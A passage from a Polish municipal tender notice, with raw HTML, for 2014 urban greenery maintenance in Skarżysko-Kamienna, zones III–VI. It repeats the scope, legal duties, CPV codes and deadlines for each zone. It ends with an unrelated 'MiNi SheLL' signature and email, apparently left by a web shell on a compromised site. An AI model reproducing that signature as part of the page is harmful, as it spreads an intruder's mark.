Opis robót objętych ryczałtowym bieżącym utrzymaniem  Strefy VI opisuje                             zał.3-2 i 5/6, natomiast dla Strefy I - V : zał. Nr 3, 4 i odpowiednio 5/1 do 5/5.Rozliczenie prowadzone będzie w PLN.
Zakres robót oraz częstotliwość ich realizacji dostosowana będzie do posiadanych środków finansowych i warunków wegetacji roślin.
2.	Na Wykonawcy ciążą wszystkie obowiązki wynikające z: 
ustawy z dnia 14.12.2012  r. o odpadach ( Dz.U. z 2013 r. poz. 21 ze zm. );
 ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach                          (Dz.U. z 2012 r. , poz. 391 ze zm. ),
ustawy z dnia 27.04.2001 r. - Prawo ochrony środowiska (Dz.U. z  2008 r. Nr 25,                 poz. 150 ze zm. ),
       uchwały Rady Miasta Nr XXXI/102/2012 z dnia 29 listopada 2012 r.w sprawie uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy                               Skarżysko - Kamienna.
 Wspólny Słownik Zamówień (CPV); 
77211500-7 Usługi pielęgnacji drzew                                                                                                                              77313000-7 Usługi utrzymania parków                                                                                                     77310000-6 Usługi sadzenia roślin oraz utrzymanie terenów zielonych.;                                                77314100-5 Usługi w zakresie trawników;                                                                                              77342000-9 przycinanie żywopłotów;                                                                                                             77300000-3 usługi ogrodnicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 Utrzymanie zieleni miejskiej w roku 2014 - Strefa III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w istotnych dla stron postanowieniach, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego  stanowiących zał. Nr 8 do SIWZ.
Opis robót objętych ryczałtowym bieżącym utrzymaniem  Strefy VI opisuje                             zał.3-2 i 5/6, natomiast dla Strefy I - V : zał. Nr 3, 4 i odpowiednio 5/1 do 5/5.Rozliczenie prowadzone będzie w PLN.
Zakres robót oraz częstotliwość ich realizacji dostosowana będzie do posiadanych środków finansowych i warunków wegetacji roślin.
2.	Na Wykonawcy ciążą wszystkie obowiązki wynikające z: 
ustawy z dnia 14.12.2012  r. o odpadach ( Dz.U. z 2013 r. poz. 21 ze zm. );
 ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach                          (Dz.U. z 2012 r. , poz. 391 ze zm. ),
ustawy z dnia 27.04.2001 r. - Prawo ochrony środowiska (Dz.U. z  2008 r. Nr 25,                 poz. 150 ze zm. ),
       uchwały Rady Miasta Nr XXXI/102/2012 z dnia 29 listopada 2012 r.w sprawie uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy                               Skarżysko - Kamienna.
 Wspólny Słownik Zamówień (CPV); 
77211500-7 Usługi pielęgnacji drzew                                                                                                                              77313000-7 Usługi utrzymania parków                                                                                                     77310000-6 Usługi sadzenia roślin oraz utrzymanie terenów zielonych.;                                                77314100-5 Usługi w zakresie trawników;                                                                                              77342000-9 przycinanie żywopłotów;                                                                                                             77300000-3 usługi ogrodnicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 Utrzymanie zieleni miejskiej w roku 2014 - Strefa IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w istotnych dla stron postanowieniach, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego  stanowiących zał. Nr 8 do SIWZ.
Opis robót objętych ryczałtowym bieżącym utrzymaniem  Strefy VI opisuje                             zał.3-2 i 5/6, natomiast dla Strefy I - V : zał. Nr 3, 4 i odpowiednio 5/1 do 5/5.Rozliczenie prowadzone będzie w PLN.
Zakres robót oraz częstotliwość ich realizacji dostosowana będzie do posiadanych środków finansowych i warunków wegetacji roślin.
2.	Na Wykonawcy ciążą wszystkie obowiązki wynikające z: 
ustawy z dnia 14.12.2012  r. o odpadach ( Dz.U. z 2013 r. poz. 21 ze zm. );
 ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach                          (Dz.U. z 2012 r. , poz. 391 ze zm. ),
ustawy z dnia 27.04.2001 r. - Prawo ochrony środowiska (Dz.U. z  2008 r. Nr 25,                 poz. 150 ze zm. ),
       uchwały Rady Miasta Nr XXXI/102/2012 z dnia 29 listopada 2012 r.w sprawie uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy                               Skarżysko - Kamienna.
 Wspólny Słownik Zamówień (CPV); 
77211500-7 Usługi pielęgnacji drzew                                                                                                                              77313000-7 Usługi utrzymania parków                                                                                                     77310000-6 Usługi sadzenia roślin oraz utrzymanie terenów zielonych.;                                                77314100-5 Usługi w zakresie trawników;                                                                                              77342000-9 przycinanie żywopłotów;                                                                                                             77300000-3 usługi ogrodnicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5 Utrzymanie zieleni miejskiej w roku 2014 - Strefa V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w istotnych dla stron postanowieniach, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego  stanowiących zał. Nr 8 do SIWZ.
Opis robót objętych ryczałtowym bieżącym utrzymaniem  Strefy VI opisuje                             zał.3-2 i 5/6, natomiast dla Strefy I - V : zał. Nr 3, 4 i odpowiednio 5/1 do 5/5.Rozliczenie prowadzone będzie w PLN.
Zakres robót oraz częstotliwość ich realizacji dostosowana będzie do posiadanych środków finansowych i warunków wegetacji roślin.
2.	Na Wykonawcy ciążą wszystkie obowiązki wynikające z: 
ustawy z dnia 14.12.2012  r. o odpadach ( Dz.U. z 2013 r. poz. 21 ze zm. );
 ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach                          (Dz.U. z 2012 r. , poz. 391 ze zm. ),
ustawy z dnia 27.04.2001 r. - Prawo ochrony środowiska (Dz.U. z  2008 r. Nr 25,                 poz. 150 ze zm. ),
       uchwały Rady Miasta Nr XXXI/102/2012 z dnia 29 listopada 2012 r.w sprawie uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy                               Skarżysko - Kamienna.
 Wspólny Słownik Zamówień (CPV); 
77211500-7 Usługi pielęgnacji drzew                                                                                                                              77313000-7 Usługi utrzymania parków                                                                                                     77310000-6 Usługi sadzenia roślin oraz utrzymanie terenów zielonych.;                                                77314100-5 Usługi w zakresie trawników;                                                                                              77342000-9 przycinanie żywopłotów;                                                                                                             77300000-3 usługi ogrodnicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6 Utrzymanie zieleni miejskiej w roku 2014 - Strefa VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w istotnych dla stron postanowieniach, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego  stanowiących zał. Nr 8 do SIWZ.
Opis robót objętych ryczałtowym bieżącym utrzymaniem  Strefy VI opisuje                             zał.3-2 i 5/6, natomiast dla Strefy I - V : zał. Nr 3, 4 i odpowiednio 5/1 do 5/5.Rozliczenie prowadzone będzie w PLN.
Zakres robót oraz częstotliwość ich realizacji dostosowana będzie do posiadanych środków finansowych i warunków wegetacji roślin.
2.	Na Wykonawcy ciążą wszystkie obowiązki wynikające z: 
ustawy z dnia 14.12.2012  r. o odpadach ( Dz.U. z 2013 r. poz. 21 ze zm. );
 ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach                          (Dz.U. z 2012 r. , poz. 391 ze zm. ),
ustawy z dnia 27.04.2001 r. - Prawo ochrony środowiska (Dz.U. z  2008 r. Nr 25,                 poz. 150 ze zm. ),
       uchwały Rady Miasta Nr XXXI/102/2012 z dnia 29 listopada 2012 r.w sprawie uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy                               Skarżysko - Kamienna.
 Wspólny Słownik Zamówień (CPV); 
77211500-7 Usługi pielęgnacji drzew                                                                                                                              77313000-7 Usługi utrzymania parków                                                                                                     77310000-6 Usługi sadzenia roślin oraz utrzymanie terenów zielonych.;                                                77314100-5 Usługi w zakresie trawników;                                                                                              77342000-9 przycinanie żywopłotów;                                                                                                             77300000-3 usługi ogrodnicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com